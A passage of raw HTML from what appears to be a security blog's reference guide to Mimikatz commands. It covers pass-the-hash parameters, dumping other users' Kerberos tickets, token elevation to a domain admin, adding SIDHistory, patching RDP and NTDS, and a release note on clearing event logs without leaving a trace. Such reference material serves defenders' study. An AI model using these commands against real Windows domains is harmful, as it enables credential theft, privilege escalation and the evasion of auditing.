https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV-211x300.png 211w" sizes="(max-width: 473px) 100vw, 473px" /></a></p> <p><b>SEKURLSA::Process</b> &#8211; switch to LSASS process context</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Process.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1840" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Process.png" alt="Mimikatz-Sekurlsa-Process" width="273" height="36" /></a></p> <p><a id="SEKURLSAPth"></a><b>SEKURLSA::Pth</b> &#8211; Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).</p> <p><em>Mimikatz can perform the well-known operation &#8216;Pass-The-Hash&#8217; to run a process under another credentials with NTLM hash of the user&#8217;s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).</em></p> <ul> <li>/user &#8211; the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.</li> <li>/domain &#8211; the fully qualified domain name &#8211; without domain or in case of local user/admin, use computer or server name, workgroup or whatever.</li> <li>/rc4 or /ntlm &#8211; optional &#8211; the RC4 key / NTLM hash of the user&#8217;s password.</li> <li>/run &#8211; optional &#8211; the command line to run &#8211; default is: cmd to have a shell.</li> </ul> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg" rel="attachment wp-att-2174"><img loading="lazy" decoding="async" class="alignnone wp-image-2174" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg" alt="Mimikatz-Sekurlsa-PTH" width="645" height="272" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg 1682w, 
https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH-300x127.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH-768x325.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH-1024x433.jpg 1024w" sizes="(max-width: 645px) 100vw, 645px" /></a></p> <p><span style="text-decoration: underline;">Benjamin&#8217;s Remarks:</span></p> <ul> <li>This command does not work with minidumps (nonsense);</li> <li>it requires elevated privileges (privilege::debug or SYSTEM account), unlike &#8216;Pass-The-Ticket&#8217; which uses one official API ;<br /> this new version of &#8216;Pass-The-Hash&#8217; replaces the Kerberos RC4 keys with the ntlm hash (and/or replaces AES keys) &#8211; it permits the Kerberos provider to ask for TGT tickets! ;</li> <li>ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ;</li> <li>AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.</li> </ul> <p><a href="http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash">Benjamin&#8217;s post on overpass-the-hash</a>.</p> <p><b>SEKURLSA::SSP</b> &#8211; Lists SSP credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1841" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP.png" alt="Mimikatz-Sekurlsa-SSP" width="481" height="670" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP.png 481w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP-215x300.png 215w" sizes="(max-width: 481px) 100vw, 481px" /></a></p> <p><a id="SEKURLSATickets"></a><b>SEKURLSA::Tickets</b> &#8211; Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and 
the local computer&#8217;s AD computer account.<br /> Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).</p> <ul> <li>/export &#8211; optional &#8211; tickets are exported in .kirbi files. They start with the user&#8217;s LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT)</li> </ul> <p>Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service.<br /> This is extremely useful to an attacker who has compromised a web server that users access and that is configured for Kerberos delegation to a backend SQL server. This enables the attacker to capture and reuse all user tickets in memory on that server.</p> <p>The “kerberos::tickets” mimikatz command dumps the currently logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.</p> <p>Command: <em>mimikatz sekurlsa::tickets exit</em></p> <ul> <li>Dumps all authenticated Kerberos tickets on a system.</li> <li>Requires administrator access (with debug) or Local SYSTEM rights</li> </ul> <p>The following screenshot shows the dumped password and Kerberos tickets (TGS &amp; TGT) of another user who is a Domain Admin (LukeSkywalker).</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets_thumb.png" alt="Mimikatz-SekurlsaTickets" width="874" height="824" border="0" /></span></a><a 
href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part2-AdminTGT.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets-Part2-AdminTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part2-AdminTGT_thumb.png" alt="Mimikatz-SekurlsaTickets-Part2-AdminTGT" width="874" height="257" border="0" /></span></a></p> <p><span style="font-family: times new roman;"><span style="font-size: medium; font-family: times new roman;">The following screenshot </span><span style="font-size: medium;">shows dumped credentials and Kerberos tickets (TGS &amp; TGT) of another admin (HanSolo).</span></span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part3-AdminTGT.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets-Part3-AdminTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part3-AdminTGT_thumb.png" alt="Mimikatz-SekurlsaTickets-Part3-AdminTGT" width="877" height="833" border="0" /></span></a></p> <p><span style="font-family: times new roman;"><span style="font-size: medium; font-family: times new roman;">The following screenshot </span><span style="font-size: medium;">shows dumped credentials and Kerberos tickets (TGS &amp; TGT) for a SQL service account (svc-SQLDBEngine01).</span></span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part4-ServiceTGT.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; 
padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets-Part4-ServiceTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part4-ServiceTGT_thumb.png" alt="Mimikatz-SekurlsaTickets-Part4-ServiceTGT" width="879" height="726" border="0" /></span></a></p> <p>&nbsp;</p> <p><b>SEKURLSA::Trust</b> &#8211; get trust keys<br /> <em>(I think this is deprecated in favor of lsadump::trust /patch)</em></p> <p><b>SEKURLSA::TSPKG</b> &#8211; Lists TsPkg credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1843" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG.png" alt="Mimikatz-Sekurlsa-TSPKG" width="471" height="670" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG.png 471w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG-211x300.png 211w" sizes="(max-width: 471px) 100vw, 471px" /></a></p> <p><b>SEKURLSA::Wdigest</b> &#8211; List WDigest credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest.jpg" rel="attachment wp-att-2154"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2154" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest.jpg" alt="Mimikatz-sekurlsa-wdigest" width="1676" height="1527" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest.jpg 1676w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest-300x273.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest-768x700.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest-1024x933.jpg 1024w" sizes="(max-width: 1676px) 100vw, 1676px" /></a></p> <h4></h4> <h4><b><a id="SERVICE"></a>SERVICE</b></h4> <p><b>SERVICE::+</b>  (plus sign)- Install Mimikatz 
service (&#8216;mimikatzsvc&#8217;)</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3818" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Plus.png" alt="" width="475" height="114" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Plus.png 753w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Plus-300x72.png 300w" sizes="(max-width: 475px) 100vw, 475px" /></p> <p><b>SERVICE::-  </b>(minus sign) &#8211; Uninstall Mimikatz service (&#8216;mimikatzsvc&#8217;)</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3817" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Minus.png" alt="" width="374" height="83" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Minus.png 523w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Minus-300x67.png 300w" sizes="(max-width: 374px) 100vw, 374px" /></p> <p><b>SERVICE::List </b>&#8211; List Services</p> <p><b>SERVICE::Me</b></p> <p><b>SERVICE::Preshutdown</b> &#8211; preshutdown service</p> <p><b>SERVICE::Remove</b> &#8211; Remove service</p> <p><b>SERVICE::Resume</b> &#8211; resume service</p> <p><b>SERVICE::Shutdown</b> &#8211; shutdown service</p> <p><b>SERVICE::Start</b> &#8211; Start a service</p> <p><b>SERVICE::Stop</b> &#8211; Stop service</p> <p><b>SERVICE::Suspend</b> &#8211; Suspend the service</p> <p>&nbsp;</p> <h4><b><a id="SID"></a>SID</b></h4> <p>The Mimikatz SID module replaces MISC::AddSID. 
Use SID::Patch to patch the ntds service.</p> <p><b>SID::add </b>&#8211; Add a SID to SIDHistory of an object</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2866" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png" alt="Mimikatz-SID-add" width="601" height="153" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png 1876w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add-300x76.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add-768x196.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add-1024x261.png 1024w" sizes="(max-width: 601px) 100vw, 601px" /></a></p> <p><b>SID::clear </b>&#8211; Clear SIDHistory of an object</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2867" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query.png" alt="Mimikatz-SID-clear-query" width="599" height="372" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query.png 1627w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query-300x186.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query-768x477.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query-1024x636.png 1024w" sizes="(max-width: 599px) 100vw, 599px" /></a></p> <p><strong>SID::lookup</strong> &#8211; Name (/name) or SID (/sid) lookup</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2863" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup.png" alt="Mimikatz-SID-Lookup" width="492" height="86" 
srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup.png 1498w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup-300x53.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup-768x135.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup-1024x180.png 1024w" sizes="(max-width: 492px) 100vw, 492px" /></a></p> <p><b>SID::modify</b> &#8211; Modify the object SID of an object</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2865" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png" alt="Mimikatz-SID-Modify" width="777" height="149" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png 2527w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify-300x57.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify-768x147.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify-1024x196.png 1024w" sizes="(max-width: 777px) 100vw, 777px" /></a></p> <p><b>SID::patch</b> &#8211; Patch the NTDS service</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2868" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch.png" alt="Mimikatz-SID-Patch" width="374" height="68" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch.png 970w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch-300x55.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch-768x140.png 768w" sizes="(max-width: 374px) 100vw, 374px" /></a></p> <p><b>SID::query</b> &#8211; Query an object by SID or name</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query.png"><img loading="lazy" decoding="async" 
class="alignnone wp-image-2864" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query.png" alt="Mimikatz-SID-query" width="491" height="114" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query.png 1635w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query-300x70.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query-768x178.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query-1024x238.png 1024w" sizes="(max-width: 491px) 100vw, 491px" /></a></p> <p>&nbsp;</p> <h4><b><a id="STANDARD"></a>STANDARD</b></h4> <p><b>STANDARD::Answer</b> &#8211; Answer to the Ultimate Question of Life, the Universe, and Everything.</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3816" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Answer.png" alt="" width="285" height="49" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Answer.png 436w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Answer-300x52.png 300w" sizes="(max-width: 285px) 100vw, 285px" /></p> <p><b>STANDARD::Base64</b> &#8211; switch output to base64 encoding</p> <p><b>STANDARD::CD</b> &#8211; change or display the current directory</p> <p><b>STANDARD::CLS</b> &#8211; Clear the screen</p> <p><b>STANDARD::Coffee</b> &#8211; show an ASCII image of coffee 🙂</p> <p><b>STANDARD::Exit</b> &#8211; quit Mimikatz</p> <p><b>STANDARD::Hostname</b> &#8211; Displays the local hostname</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3822" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Hostname.png" alt="" width="315" height="57" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Hostname.png 465w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Hostname-300x54.png 300w" sizes="(max-width: 315px) 100vw, 315px" /></p> <p><b>STANDARD::LocalTime </b>&#8211; 
Displays the system's local date and time (OJ command)</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3821" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-LocalTime.png" alt="" width="313" height="78" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-LocalTime.png 473w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-LocalTime-300x75.png 300w" sizes="(max-width: 313px) 100vw, 313px" /></p> <p><b>STANDARD::Log</b> &#8211; Send Mimikatz output to a log file</p> <p><b>STANDARD::MarkRus</b> &#8211; Pass-the-Hash information. 😉<br /> <em>Removed in Mimikatz 2.1.1</em></p> <p><b>STANDARD::Sleep</b> &#8211; sleep for the specified number of milliseconds</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3820" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Sleep.png" alt="" width="306" height="50" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Sleep.png 465w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Sleep-300x49.png 300w" sizes="(max-width: 306px) 100vw, 306px" /></p> <p><strong>STANDARD::Version</strong> &#8211; display version information</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3813" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Version.png" alt="" width="352" height="99" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Version.png 586w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Version-300x84.png 300w" sizes="(max-width: 352px) 100vw, 352px" /></p> <p>&nbsp;</p> <h4><b><a id="SYSENV"></a>SYSENV</b></h4> <p>The Mimikatz SYSENV module provides the ability to manage system environment variables.</p> <p><b>SYSENV::List<br /> SYSENV::Get<br /> SYSENV::Set<br /> SYSENV::Del</b></p> <p>&nbsp;</p> <h4><b><a id="TOKEN"></a>TOKEN</b></h4> <p>The Mimikatz Token module enables Mimikatz to interact with 
Windows authentication tokens, including grabbing and impersonating existing tokens.</p> <p><a id="TOKENElevate"></a><b>TOKEN::Elevate</b> &#8211; impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API.<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png" rel="attachment wp-att-2805"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2805" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png" alt="Mimikatz-Token-Elevate1" width="836" height="117" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png 836w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1-300x42.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1-768x107.png 768w" sizes="(max-width: 836px) 100vw, 836px" /></a></p> <p>Find a domain admin credential on the box and use that token: <em>token::elevate /domainadmin</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg" rel="attachment wp-att-2175"><img loading="lazy" decoding="async" class="alignnone wp-image-2175" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg" alt="Mimikatz-Token-Elevate-DomainAdmin" width="811" height="114" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg 1901w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin-300x42.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin-768x108.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin-1024x144.jpg 1024w" sizes="(max-width: 811px) 100vw, 811px" /></a></p> <p><a id="TOKENList"></a><b>TOKEN::List</b> &#8211; list all 
tokens of the system</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1845" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List.png" alt="Mimikatz-Token-List" width="842" height="589" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List.png 842w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List-300x210.png 300w" sizes="(max-width: 842px) 100vw, 842px" /></a></p> <p><b>TOKEN::Revert</b> &#8211; revert to process token</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1847" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami.png" alt="Mimikatz-Token-Whoami" width="839" height="167" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami.png 839w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami-300x60.png 300w" sizes="(max-width: 839px) 100vw, 839px" /></a></p> <p><b>TOKEN::Run </b>&#8211; Run</p> <p><b>TOKEN::Whoami</b> &#8211; Display current identity</p> <p>&nbsp;</p> <h4><b><a id="TS"></a>TS</b></h4> <p><b>TS::MultiRDP</b> &#8211; (experimental) Patch Terminal Server service to allow multiple users</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1848" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png" alt="Mimikatz-TS-MultiRDP" width="266" height="40" /></a></p> <p><b>TS::Sessions </b>&#8211; List TS/RDP sessions.</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3812" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png" alt="" width="300" height="564" 
srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png 586w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions-160x300.png 160w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions-545x1024.png 545w" sizes="(max-width: 300px) 100vw, 300px" /></p> <p><b>TS::Remote </b></p> <p>&nbsp;</p> <h4><b><a id="VAULT"></a>VAULT</b></h4> <p><b>VAULT::List</b> &#8211; list vault credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1849" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List.png" alt="Mimikatz-Vault-List" width="726" height="140" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List.png 726w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List-300x58.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List-720x140.png 720w" sizes="(max-width: 726px) 100vw, 726px" /></a></p> <p><b>VAULT::Cred</b> &#8211; cred</p> <p>&nbsp;</p> <h3><strong><a id="MimikatzVersionHistory"></a>Mimikatz Version History</strong></h3> <p><em>Sourced from <a href="https://github.com/gentilkiwi/mimikatz/releases">Mimikatz release Github page</a> </em></p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 12/20/2017<br /> </strong>2.1.1 20171220<strong><br /> </strong>Clear event logs without the event log logging 1102 &#8220;Event Log Cleared&#8221;</p> <p>Mimikatz 2.1.1 &#8211; Release Date: 12/19/2017<br /> 2.1.1 20171219</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 12/18/2017</strong><br /> 2.1.1 20171218<br /> mimidrv updated for Windows 10 version 1709, (x64)</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 11/28/2017<br /> </strong>2.1.1 20171128</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 11/06/2017<br /> </strong>2.1.1 20171106<br /> [fix #107] remove _vscwprintf dependency with mimilove on 
Windows 2000<br /> [credits] with his work on AD, Vincent Le Toux (@vletoux) is starring as co-author 🙂<br /> [internal] DRSR RPC<br /> [fix] dcsync export as CSV without junk chars between username and NTLM hash</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 08/13/2017<br /> </strong>2.1.1 20170813<br /> crypto::extract now supports CAPI &amp; BCrypt (RSA/AES/DES/3DES/DESX/RC4/RC2&#8230;)<br /> [new] lsadump::changentlm to *change* user password/hash to another password/hash</p> <p>&#8230;</p> <p><strong>Mimikatz Release Date: 6/06/2016<br /> </strong>2.1 alpha 20160506.1 (oe.eo) edition<br /> [remove] mimikatz lsadump::dcsync req v10 &amp; rep v9<br /> [future fix] mimikatz lsadump::dcsync pDrsExtensionsInt-&gt;dwExtCaps = MAXDWORD32</p> <p><strong>Mimikatz Release Date: 6/06/2016<br /> </strong>2.1 alpha 20160606 (oe.eo) edition<br /> [fix #47] mimikatz lsadump::dcsync &#8216;Fun with flags&#8217; to support AD Privileged Access Management in 2016 TP5 (req v10 &amp; rep v9)</p> <p><strong>Mimikatz Release Date: 6/04/2016<br /> </strong>2.1 alpha 20160604 (oe.eo) edition<br /> [fix #46] MSV structure alignment for Windows 10 &gt; LTSB (LSAISo &amp; normal)<br /> [enhancement] SID/Name lookup &amp; LDAP query now with system arg (not only local/current domain)</p> <p><strong>Mimikatz Release Date: 6/01/2016<br /> </strong>2.1 alpha 20160601 (oe.eo) edition<br /> [fix] mimikatz lsadump::dcsync now supports AD with recycle bin enabled (thanks to Marcus Rath for report)</p> <p><strong>Mimikatz Release Date: 5/25/2016<br /> </strong>2.1 alpha 20160525 (oe.eo) edition<br /> lsadump::netsync to ask a DC to send current and previous NTLM hash of DC/SRV/WKS<br /> Lots of thanks to @asolino for his help!</p> <p><strong>Mimikatz Release Date: 5/22/2016</strong><br /> 2.1 alpha 20160522 (oe.eo) edition<br /> [fix #39] Removing 2 bytes of alignment when using LSAIso with MSV</p> <p><strong>Mimikatz Release Date: 5/06/2016</strong><br /> 2.1 alpha 20160506 (oe.eo) 
edition<br /> [fix #36] Replace wcsicmp by _wcsicmp to avoid warnings with moderns VS<br /> New SID module<br /> [remove] misc::addsid<br /> [new] sid:: module, to lookup, query, modify, add&#8230; (2003/2008r2/2012r2 right now)</p> <p><strong>Mimikatz Release Date: 4/30/2016<br /> </strong>2.1 alpha 20160501 (oe.eo) edition<br /> [close #35] DCSync works with renamed domains<br /> Thanks to @rmbolger &amp; @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch</p> <p><strong>Mimikatz Release Date: 3/27/2016<br /> </strong><em>2.1 alpha 20160327 (oe.eo) edition</em><br /> <em>Welcome to Windows 10 LTSB &amp; current</em><br /> <em>[remove] mimidrv &amp; mimikatz kernel module: Process &amp; Object callbacks remover are not anymore in the program</em><br /> <em>[internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current)</em><br /> <em>[internal] mimidrv: Windows 10 support added</em><br /> <em>[internal] mimilib WinDBG module &amp; mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table)</em><br /> <em>[internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function</em></p> <p><strong>Mimikatz Release Date: 2/29/2016<br /> </strong><em>2.1 alpha 20160229 (oe.eo) edition</em><br /> System Environment Variables &amp; other stuff<br /> [new] System Environment Variables user module<br /> [new] System Environment Variables kernel IOCTL for Set<br /> [enhancement] privilege::sysenv<br /> [enhancement] Busylight<br /> [enhancement] misc::skeleton can avoid anti-AES patching for aware clients with /letaes</p> <p><strong>Mimikatz Release Date: 2/17/2016</strong><br /> <em>2.1 alpha 20160217 (oe.eo) edition</em><br /> [new] crypto::certificates /silent &amp; /nokey flags<br /> [new] crypto::keys /silent flag<br /> [new] kull_m_busylight module now support protocol for new devices</p> <p><strong>Mimikatz Release Date: 2/07/2016</strong><br /> Some DPAPI stuff<br /> [new] vault 
